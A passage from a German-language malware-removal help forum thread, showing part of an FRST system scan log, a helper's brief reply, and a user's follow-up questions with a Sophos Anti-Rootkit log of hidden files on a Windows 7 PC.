R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-16 15:50 - 2014-01-16 15:50 - 00001166 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-01-16 15:48 - 2014-01-16 15:49 - 06072408 _____ (TeamViewer GmbH) C:\Users\*****\Downloads\TeamViewer_Setup_de.exe
2014-01-16 15:08 - 2014-01-16 20:14 - 00000000 ____D C:\Users\*****\AppData\Local\VMware
2014-01-16 15:08 - 2014-01-16 20:08 - 00000000 ____D C:\Users\*****\AppData\Roaming\VMware
2014-01-16 15:08 - 2013-10-08 18:21 - 00073296 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vsock.sys
2014-01-16 15:08 - 2013-10-08 18:21 - 00067664 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-01-16 15:08 - 2013-10-08 18:21 - 00063568 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-01-16 15:07 - 2013-10-18 12:46 - 00064080 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vmx86.sys
2014-01-16 15:07 - 2013-10-18 12:45 - 00930384 _____ (VMware, Inc.) C:\Windows\system32\vnetlib64.dll
2014-01-16 15:07 - 2013-10-18 12:45 - 00437328 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
2014-01-16 15:07 - 2013-10-18 12:45 - 00358480 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
2014-01-16 15:07 - 2013-10-18 12:45 - 00030800 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vmnetuserif.sys
2014-01-16 15:07 - 2013-10-18 12:44 - 00032848 _____ (VMware, Inc.) C:\Windows\system32\Drivers\VMkbd.sys
2014-01-16 15:07 - 2013-10-09 08:04 - 00053816 _____ (VMware, Inc.) C:\Windows\system32\Drivers\hcmon.sys
2014-01-16 15:06 - 2014-01-16 19:42 - 00000000 ____D C:\ProgramData\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00002124 _____ C:\Users\Public\Desktop\VMware Player.lnk
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files\Common Files\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files (x86)\VMware
2014-01-16 10:51 - 2014-01-16 10:51 - 00000000 ____D C:\Program Files (x86)\ESET
2014-01-16 08:22 - 2014-01-16 08:22 - 00000404 _____ C:\Users\*****\Desktop\LAN-Verbindung - Verknüpfung.lnk
2014-01-15 20:58 - 2014-01-15 20:58 - 00000400 _____ C:\Users\*****\Desktop\Malwarebytes  Malwarebytes Anti-Rootkit BETA.website
2014-01-15 16:05 - 2014-01-15 16:05 - 00000000 ____D C:\Users\*****\Desktop\ProcessExplorer_1540
2014-01-15 12:08 - 2014-01-15 12:08 - 00001638 _____ C:\Users\*****\Desktop\BU-pst - bald wieder löschen.lnk
2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 10:47 - 2014-01-15 11:04 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 07:24 - 2013-11-27 02:41 - 00343040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00325120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-01-15 07:24 - 2013-11-26 12:40 - 00376768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2014-01-15 07:24 - 2013-11-26 11:32 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService

==================== One Month Modified Files and Folders =======

2014-01-17 07:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-17 07:34 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-17 07:21 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-17 07:03 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-17 06:44 - 2010-07-28 14:21 - 01560187 _____ C:\Windows\WindowsUpdate.log
2014-01-16 20:14 - 2014-01-16 15:08 - 00000000 ____D C:\Users\*****\AppData\Local\VMware
2014-01-16 20:08 - 2014-01-16 15:08 - 00000000 ____D C:\Users\*****\AppData\Roaming\VMware
2014-01-16 19:42 - 2014-01-16 15:06 - 00000000 ____D C:\ProgramData\VMware
2014-01-16 19:41 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-16 16:33 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-16 16:32 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-16 15:50 - 2014-01-16 15:50 - 00001166 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-01-16 15:49 - 2014-01-16 15:48 - 06072408 _____ (TeamViewer GmbH) C:\Users\*****\Downloads\TeamViewer_Setup_de.exe
2014-01-16 15:06 - 2014-01-16 15:06 - 00002124 _____ C:\Users\Public\Desktop\VMware Player.lnk
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files\Common Files\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files (x86)\VMware
2014-01-16 15:06 - 2011-05-18 15:43 - 01650334 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-16 15:06 - 2010-07-26 14:08 - 00703102 _____ C:\Windows\system32\perfh007.dat
2014-01-16 15:06 - 2010-07-26 14:08 - 00150424 _____ C:\Windows\system32\perfc007.dat
2014-01-16 14:42 - 2013-04-19 11:22 - 00002179 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2014-01-16 12:45 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-16 12:45 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-16 10:51 - 2014-01-16 10:51 - 00000000 ____D C:\Program Files (x86)\ESET
2014-01-16 10:45 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-16 08:22 - 2014-01-16 08:22 - 00000404 _____ C:\Users\*****\Desktop\LAN-Verbindung - Verknüpfung.lnk
2014-01-16 07:21 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-16 06:34 - 2009-07-14 06:08 - 00032640 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2014-01-16 06:34 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-16 06:34 - 2009-07-14 05:51 - 00138261 _____ C:\Windows\setupact.log
2014-01-16 06:33 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-16 03:25 - 2009-07-14 05:45 - 01347808 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-16 03:24 - 2009-11-18 23:09 - 00812778 _____ C:\Windows\PFRO.log
2014-01-16 03:08 - 2009-11-18 22:48 - 00000000 ____D C:\ProgramData\Microsoft Help
2014-01-16 03:04 - 2013-08-17 21:05 - 00000000 ____D C:\Windows\system32\MRT
2014-01-16 03:04 - 2010-12-18 09:40 - 86054176 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-01-15 20:58 - 2014-01-15 20:58 - 00000400 _____ C:\Users\*****\Desktop\Malwarebytes  Malwarebytes Anti-Rootkit BETA.website
2014-01-15 16:05 - 2014-01-15 16:05 - 00000000 ____D C:\Users\*****\Desktop\ProcessExplorer_1540
2014-01-15 12:08 - 2014-01-15 12:08 - 00001638 _____ C:\Users\*****\Desktop\BU-pst - bald wieder löschen.lnk
2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 11:04 - 2014-01-15 10:47 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\*****
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================


Old 17.01.2014, 20:41   #6
schrauber
/// the machine
/// TB Trainer


Quote:
Only JS/TrojanDownloader.Agent.NSA trojan was found in the backup files of the hacked websites (.js). But I was aware of that. I deleted the lines because too many names appear in them.
Well, it had to be deleted.

Quote:
The only remaining worry is whether someone might still be on the PC
What makes you think that might be the case?

Old 18.01.2014, 16:54   #7
franz12
 

Quote:
The only remaining worry is whether someone might still be on the PC
What makes you think that might be the case?
By that I only mean my subjective feeling. The system runs perfectly.

Three more questions, if I may
1) Was there anything suspicious in the logs at the beginning of this thread?
2) Can I run any other tools over it?
3) What should I use to scan USB sticks and external hard drives that were repeatedly connected to the PC?

I also ran Sophos Anti-Rootkit over it. Here is the sarscan.log:
Code:
Sophos Anti-Rootkit Version 1.5.0  (c) 2009 Sophos Plc
Started logging on 17.01.2014 at 13:54:56
User "*****" on computer "*****-PC"
Windows version 6.1 SP 1.0 Service Pack 1 build 7601 SM=0x300 PT=0x1 WOW64
Info:	Starting registry scan.
Hidden:	registry item \HKEY_USERS\S-1-5-18\Software\Microsoft\CTF\Assemblies\0x00000409
Hidden:	registry item \HKEY_USERS\S-1-5-18\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
Info:	Starting disk scan of C: (NTFS).
Hidden:	file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Registration\SetupGREG.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Adobe Flash Player\Install Flash Player 10 ActiveX.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Backup Management Advanced\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\eSobi\eSobiLiteSetup-SAB-204.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Google Toolbar Acer Edition\Installer_v6.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MyWinLocker v3\MyWinLocker.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MyWinLocker v3\program files\EgisTec\MyWinLocker 3\Shredder.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Nero 9 Essentials Acer Edition\unnero.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Welcome Center\SetupOWC.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MCI Home key (Smart Launcher)\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\SET\Screen saver\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\SET\SmartLauncher\Setup.exe
Hidden:	file C:\Program Files (x86)\Acer GameZone\Alice Greenfingers\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Amazonia\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dairy Dash\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\DEU\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\ENU\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\FRA\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\JPN\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Farm Frenzy 2\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\First Class Flurry\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Granny In Paradise\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Heroes of Hellas\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Merriam Websters Spell Jam\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\InstallShield Installation Information\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}\setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Arcade Deluxe\PCinema\setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Arcade Deluxe\setup.exe
Hidden:	file C:\Windows\System32\config\SOFTWARE.LOG2
Hidden:	file C:\OEM\Preload\Autorun\DRV\nVidia Graphic Card PCI-E Driver\Nvidia_VGA_x64\Display\NvCplSetupInt.exe
Hidden:	file C:\OEM\Preload\Autorun\DRV\nVidia Graphic Card PCI-E Driver\Nvidia_VGA_x86\Display\NvCplSetupInt.exe
Hidden:	file C:\Program Files (x86)\MAGIX\Video_deluxe_15\videodeLuxe.exe
Hidden:	file C:\Users\*****\Downloads\mbar-1.07.0.1008.exe
Hidden:	file C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
Hidden:	file C:\Users\Public\Mediaparts Interactive\FlippingBook Publisher\Updates\Professional_2_5_19_Full.exe
Hidden:	file C:\Program Files (x86)\SWFTools\gpdf2swf.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\FH_FL_Reader_Installer.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\FH_FW_Reader_Installer.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\actlib.dll
Hidden:	file C:\Program Files (x86)\Google\Picasa3\Uninstall.exe
Hidden:	file C:\Program Files (x86)\HappyFoto-Designer\Extraction.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\spk\Smab.spk
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\mencoder.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\MPlayer.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\mplayer\Mplayer.exe
Hidden:	file C:\HS3 Hotelsoftware\HS3Remote.exe
Hidden:	file C:\Program Files (x86)\FlippingBook\FlippingBook Publisher Professional\Resources\VpPrinterSetup.exe
Hidden:	file C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\extensions\printPages2Pdf@reinhold.ripper\libraries\wkhtmltox0.dll
Hidden:	file C:\Program Files (x86)\HappyFoto-Designer\HappyFoto-Designer.exe
